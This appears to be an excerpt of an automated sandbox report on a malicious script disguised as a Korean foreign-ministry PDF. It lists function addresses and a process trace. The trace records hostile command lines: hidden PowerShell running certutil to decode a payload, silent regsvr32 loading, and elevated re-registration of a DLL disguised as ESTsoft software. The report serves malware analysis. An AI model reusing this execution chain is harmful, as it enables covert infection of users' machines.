Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB4EF0 | 13_2_00007FF983DB4EF0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D9CEA0 | 13_2_00007FF983D9CEA0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DCCEAC | 13_2_00007FF983DCCEAC |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DDBE4C | 13_2_00007FF983DDBE4C |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DC8DD0 | 13_2_00007FF983DC8DD0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD6D08 | 13_2_00007FF983DD6D08 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB7CFE | 13_2_00007FF983DB7CFE |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D98D10 | 13_2_00007FF983D98D10 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D272C0 | 19_2_00007FF983D272C0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D279B0 | 19_2_00007FF983D279B0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D27EB0 | 19_2_00007FF983D27EB0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D184D0 | 19_2_00007FF983D184D0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D08320 | 19_2_00007FF983D08320 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D482F0 | 19_2_00007FF983D482F0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D422A4 | 19_2_00007FF983D422A4 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D36260 | 19_2_00007FF983D36260 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D21160 | 19_2_00007FF983D21160 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D41110 | 19_2_00007FF983D41110 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D0A860 | 19_2_00007FF983D0A860 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D3676C | 19_2_00007FF983D3676C |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D2F76C | 19_2_00007FF983D2F76C |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D24750 | 19_2_00007FF983D24750 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D09710 | 19_2_00007FF983D09710 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D3C714 | 19_2_00007FF983D3C714 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D266E0 | 19_2_00007FF983D266E0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D406F0 | 19_2_00007FF983D406F0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D385A0 | 19_2_00007FF983D385A0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D47570 | 19_2_00007FF983D47570 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D484FC | 19_2_00007FF983D484FC |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D2F504 | 19_2_00007FF983D2F504 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D4A4EC | 19_2_00007FF983D4A4EC |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D38CB0 | 19_2_00007FF983D38CB0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D0AB80 | 19_2_00007FF983D0AB80 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D42B3C | 19_2_00007FF983D42B3C |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D10B30 | 19_2_00007FF983D10B30 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D089D0 | 19_2_00007FF983D089D0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D25990 | 19_2_00007FF983D25990 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D17940 | 19_2_00007FF983D17940 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D06950 | 19_2_00007FF983D06950 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D448EC | 19_2_00007FF983D448EC |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D09080 | 19_2_00007FF983D09080 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D17020 | 19_2_00007FF983D17020 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D05050 | 19_2_00007FF983D05050 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D09FE0 | 19_2_00007FF983D09FE0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D1AF60 | 19_2_00007FF983D1AF60 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D24EF0 | 19_2_00007FF983D24EF0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D0CEA0 | 19_2_00007FF983D0CEA0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D3CEAC | 19_2_00007FF983D3CEAC |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D4BE4C | 19_2_00007FF983D4BE4C |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D38DD0 | 19_2_00007FF983D38DD0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D27CFE | 19_2_00007FF983D27CFE |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D46D08 | 19_2_00007FF983D46D08 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 19_2_00007FF983D08D10 | 19_2_00007FF983D08D10 |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\외교부 가판 2021-05-07.pdf.jse' | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\ProgramData\ 2021-05-07.pdf' | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\ProgramData\ 2021-05-07.pdf' | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\certutil.exe 'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043 | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=83FD662E69ECF919D8944D885F919F9E --mojo-platform-channel-handle=1612 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --renderer-client-id=2 --mojo-platform-channel-handle=1620 --allow-no-sandbox-job /prefetch:1 | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s C:\Windows\..\ProgramData\glK7UwV.pR9a | |
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C011.tmp.bat | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C5CF.tmp.bat | |
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BC6E485E39BA42C7D01E94B3E9769F20 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BC6E485E39BA42C7D01E94B3E9769F20 --renderer-client-id=4 --mojo-platform-channel-handle=1848 --allow-no-sandbox-job /prefetch:1 | |
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=747A9B4378C4A9B7BB34D82AEF8DC480 --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 | |
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=4DDA8CE3F3D37EB15CD09F11D5C7C42B --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=29BE366D42ABBCFC024ED1AE01B6F680 --mojo-platform-channel-handle=1828 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 | |